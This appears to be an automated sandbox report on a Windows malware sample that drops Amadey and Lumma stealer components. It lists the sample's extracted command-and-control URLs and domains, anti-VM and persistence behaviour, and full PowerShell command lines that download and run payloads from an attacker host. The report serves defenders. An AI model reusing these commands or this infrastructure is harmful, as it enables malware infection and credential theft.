Analysis
-
max time kernel
143s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 19:29
Static task
static1
General
-
Target
f6986f363dde0d5f374abd0a1dac252b.exe
-
Size
1.8MB
-
MD5
f6986f363dde0d5f374abd0a1dac252b
-
SHA1
4665c53ed2ce6bd84572fc398967d11421e00bab
-
SHA256
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
-
SHA512
733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
SSDEEP
49152:Cl/8HKuLWFBWcz/WrNKnun+YrhLOvn7e:8gLWnWczeNZn1VOf7
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
https://stalfbaclcalorieeis.shop/api
https://civilianurinedtsraov.shop/api
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
axplons.exeaxplons.exeaxplons.exef6986f363dde0d5f374abd0a1dac252b.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f6986f363dde0d5f374abd0a1dac252b.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 72 2392 powershell.exe 74 2804 powershell.exe 77 2804 powershell.exe 84 3476 powershell.exe 89 3476 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplons.exeaxplons.exeaxplons.exef6986f363dde0d5f374abd0a1dac252b.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f6986f363dde0d5f374abd0a1dac252b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f6986f363dde0d5f374abd0a1dac252b.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Newoff.exef6986f363dde0d5f374abd0a1dac252b.exeaxplons.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation Newoff.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation f6986f363dde0d5f374abd0a1dac252b.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation axplons.exe -
Executes dropped EXE 11 IoCs
Processes:
axplons.exeNewoff.exetoolspub1.exelumma1234.exevpn-1002.exei0.exei0.tmpaxplons.exeNewoff.exeaxplons.exeNewoff.exepid process 1028 axplons.exe 5036 Newoff.exe 3676 toolspub1.exe 1496 lumma1234.exe 3408 vpn-1002.exe 1820 i0.exe 1220 i0.tmp 4036 axplons.exe 1004 Newoff.exe 3212 axplons.exe 1836 Newoff.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplons.exeaxplons.exef6986f363dde0d5f374abd0a1dac252b.exeaxplons.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Wine f6986f363dde0d5f374abd0a1dac252b.exe Key opened \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Software\Wine axplons.exe -
Loads dropped DLL 1 IoCs
Processes:
vpn-1002.exepid process 3408 vpn-1002.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 91 checkip.amazonaws.com 92 checkip.amazonaws.com -
Drops file in System32 directory 1 IoCs
Processes:
i0.tmpdescription ioc process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
f6986f363dde0d5f374abd0a1dac252b.exeaxplons.exeaxplons.exeaxplons.exepid process 4152 f6986f363dde0d5f374abd0a1dac252b.exe 1028 axplons.exe 4036 axplons.exe 3212 axplons.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lumma1234.exedescription pid process target process PID 1496 set thread context of 464 1496 lumma1234.exe RegAsm.exe -
Drops file in Program Files directory 15 IoCs
Processes:
i0.tmpchrome.exedescription ioc process File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Online Security\is-GRU6D.tmp i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\scoped_dir3992_1398604847\extension.zip chrome.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml i0.tmp -
Drops file in Windows directory 1 IoCs
Processes:
f6986f363dde0d5f374abd0a1dac252b.exedescription ioc process File created C:\Windows\Tasks\axplons.job f6986f363dde0d5f374abd0a1dac252b.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2392 powershell.exe 2804 powershell.exe 3476 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3212 3676 WerFault.exe toolspub1.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3576 taskkill.exe 756 taskkill.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 81 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
f6986f363dde0d5f374abd0a1dac252b.exeaxplons.exepowershell.exepowershell.exepowershell.exeaxplons.exeaxplons.exepid process 4152 f6986f363dde0d5f374abd0a1dac252b.exe 4152 f6986f363dde0d5f374abd0a1dac252b.exe 1028 axplons.exe 1028 axplons.exe 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 4036 axplons.exe 4036 axplons.exe 3212 axplons.exe 3212 axplons.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeDebugPrivilege 756 taskkill.exe Token: SeDebugPrivilege 3576 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
i0.tmppid process 1220 i0.tmp -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
f6986f363dde0d5f374abd0a1dac252b.exeaxplons.exeNewoff.exelumma1234.exevpn-1002.execmd.exei0.exei0.tmpcmd.exechrome.exedescription pid process target process PID 4152 wrote to memory of 1028 4152 f6986f363dde0d5f374abd0a1dac252b.exe axplons.exe PID 4152 wrote to memory of 1028 4152 f6986f363dde0d5f374abd0a1dac252b.exe axplons.exe PID 4152 wrote to memory of 1028 4152 f6986f363dde0d5f374abd0a1dac252b.exe axplons.exe PID 1028 wrote to memory of 5036 1028 axplons.exe Newoff.exe PID 1028 wrote to memory of 5036 1028 axplons.exe Newoff.exe PID 1028 wrote to memory of 5036 1028 axplons.exe Newoff.exe PID 5036 wrote to memory of 3508 5036 Newoff.exe schtasks.exe PID 5036 wrote to memory of 3508 5036 Newoff.exe schtasks.exe PID 5036 wrote to memory of 3508 5036 Newoff.exe schtasks.exe PID 5036 wrote to memory of 3676 5036 Newoff.exe toolspub1.exe PID 5036 wrote to memory of 3676 5036 Newoff.exe toolspub1.exe PID 5036 wrote to memory of 3676 5036 Newoff.exe toolspub1.exe PID 1028 wrote to memory of 1496 1028 axplons.exe lumma1234.exe PID 1028 wrote to memory of 1496 1028 axplons.exe lumma1234.exe PID 1028 wrote to memory of 1496 1028 axplons.exe lumma1234.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 1496 wrote to memory of 464 1496 lumma1234.exe RegAsm.exe PID 5036 wrote to memory of 3408 5036 Newoff.exe vpn-1002.exe PID 5036 wrote to memory of 3408 5036 Newoff.exe vpn-1002.exe PID 5036 wrote to memory of 3408 5036 Newoff.exe vpn-1002.exe PID 3408 wrote to memory of 4696 3408 vpn-1002.exe cmd.exe PID 3408 wrote to memory of 4696 3408 vpn-1002.exe cmd.exe PID 3408 wrote to memory of 4696 3408 vpn-1002.exe cmd.exe PID 4696 wrote to memory of 2392 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 2392 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 2392 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 2804 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 2804 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 2804 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 1820 4696 cmd.exe i0.exe PID 4696 wrote to memory of 1820 4696 cmd.exe i0.exe PID 4696 wrote to memory of 1820 4696 cmd.exe i0.exe PID 4696 wrote to memory of 3476 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 3476 4696 cmd.exe powershell.exe PID 4696 wrote to memory of 3476 4696 cmd.exe powershell.exe PID 1820 wrote to memory of 1220 1820 i0.exe i0.tmp PID 1820 wrote to memory of 1220 1820 i0.exe i0.tmp PID 1820 wrote to memory of 1220 1820 i0.exe i0.tmp PID 1220 wrote to memory of 4940 1220 i0.tmp cmd.exe PID 1220 wrote to memory of 4940 1220 i0.tmp cmd.exe PID 4940 wrote to memory of 3992 4940 cmd.exe chrome.exe PID 4940 wrote to memory of 3992 4940 cmd.exe chrome.exe PID 3992 wrote to memory of 4232 3992 chrome.exe chrome.exe PID 3992 wrote to memory of 4232 3992 chrome.exe chrome.exe PID 1220 wrote to memory of 5012 1220 i0.tmp cmd.exe PID 1220 wrote to memory of 5012 1220 i0.tmp cmd.exe PID 1220 wrote to memory of 1676 1220 i0.tmp cmd.exe PID 1220 wrote to memory of 1676 1220 i0.tmp cmd.exe PID 1220 wrote to memory of 756 1220 i0.tmp taskkill.exe PID 1220 wrote to memory of 756 1220 i0.tmp taskkill.exe PID 1220 wrote to memory of 3576 1220 i0.tmp taskkill.exe PID 1220 wrote to memory of 3576 1220 i0.tmp taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6986f363dde0d5f374abd0a1dac252b.exe"C:\Users\Admin\AppData\Local\Temp\f6986f363dde0d5f374abd0a1dac252b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F4⤵
- Creates scheduled task(s)
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 3605⤵
- Program crash
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nse9174.tmp\abc.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10006⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Users\Admin\AppData\Local\Temp\is-L02UU.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-L02UU.tmp\i0.tmp" /SL5="$16004E,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10007⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\mqcvau > "C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\~execwithresult.txt""8⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\mqcvau9⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa4932ab58,0x7ffa4932ab68,0x7ffa4932ab7810⤵PID:4232
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\mqcvau.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\~execwithresult.txt""8⤵PID:5012
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\netxdn > "C:\Users\Admin\AppData\Local\Temp\is-4VRA4.tmp\~execwithresult.txt""8⤵PID:1676
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3676 -ip 36761⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4036
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:1004
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3212
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:1836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD5843dba8669f50168c7dcfd746f478585
SHA188d808edd1d3000b5ab55b578e5f565fb5863491
SHA256b31f2d235df67186b107037501fc465b12135e0a5e588446bcf8c2b9edf6d542
SHA5124dbf2dc18cc7a9fa137e4842ddb218c10e0a89622ca0fb2b11e977fc52dde7c349caaa635e553d897db72b7ebb14997bbdf1ac5f712b4e1cd41d2df12ceb2935
-
Filesize
16KB
MD5df91bc9d52be46d1f9f496f6b9d50d58
SHA1569dd1e794d6c4a22d3d6706ecca6d26751398b7
SHA25606b05da3a1aa0c4ecf94660545fee1779a08f2bbdd27a86de71c5befb4e62456
SHA51201ef4cf432371e8dec86e740ba538c3b38f0d6106257766ee2eb81b24a033948c76201652dba253938a2bd4df5df9090edaed4b8c800d514b8a6ebd3f7de1004
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
Filesize
210KB
MD510e9648c3c9c3f6985e5962cdc795f21
SHA1a23f89036f056b967dfb6d8c8632d4e3d56d2258
SHA2560d3928bbe9db17a0bd0ce3454c39362b60f26c1613cc8d488f69f81fbf2868c1
SHA5126c597f9278fce6d03d3aabaace82e2c6dd3afac291b484c525aeb264f9d6a6041d415ca60bac4569ca4dcd605c741f56757323fe3e20dc6978adb703ec158d6f
-
Filesize
49KB
MD5ccb630a81a660920182d1c74b8db7519
SHA17bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA5128fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811
-
Filesize
1.8MB
MD5f6986f363dde0d5f374abd0a1dac252b
SHA14665c53ed2ce6bd84572fc398967d11421e00bab
SHA2563a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD5b80362872ea704846e892f16aab924c3
SHA1222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5
-
Filesize
47KB
MD552311257a997455c0a32e1679e0b614e
SHA1395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA25650a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA51219488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0
-
Filesize
208B
MD5963fb7657217be957d7d4732d892e55c
SHA1593578a69d1044a896eb8ec2da856e94d359ef6b
SHA2561d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd
-
Filesize
43KB
MD511a38af0ad330d95d2fb709612a44fa5
SHA1bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA2560d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA5124bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9
-
Filesize
49KB
MD5ca0f7bab6f1114d11a01cb0cab79e457
SHA1bbacb093cda78af8816fe8500ce420fbc4a0770a
SHA256acf45d317e5e60622dc49d53ad4f4133eae3bf85300f00f1431920b2d8464cb1
SHA512c8266d0a2d5f841793e487f8bf9b25f165e8490a01c6d7021ee51bea19c0400e2533c5bcf572bedb83d9843b70814f9165b630c64eb2a50438e22fd29dfb53ec
-
Filesize
1KB
MD5e29c6a4fec8083bf6da387199b7d9d97
SHA1558715202b26c24eb07485d95f006c2466103064
SHA256d642b0edd0f63c5d7113e76150c056d7cf7a51c3bcdacda684349f63833ae181
SHA512b78216077640284cebcd4d3207d3424d8ec82d91995c11f693800071fec255bc74fa8d0bb0e66c1cad4b9c9efd72ebab1a14631db4e4487676849e584a2763ba
-
Filesize
8KB
MD5d57a101cf48bd00b5297596c081ece42
SHA147be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA5127110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5
-
Filesize
3KB
MD5ca00972a17d51a3e6a28cfc8711474e4
SHA1c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA5129731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516
-
Filesize
108KB
MD5432c4c1300ba1c077fbd681f9667a104
SHA133482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
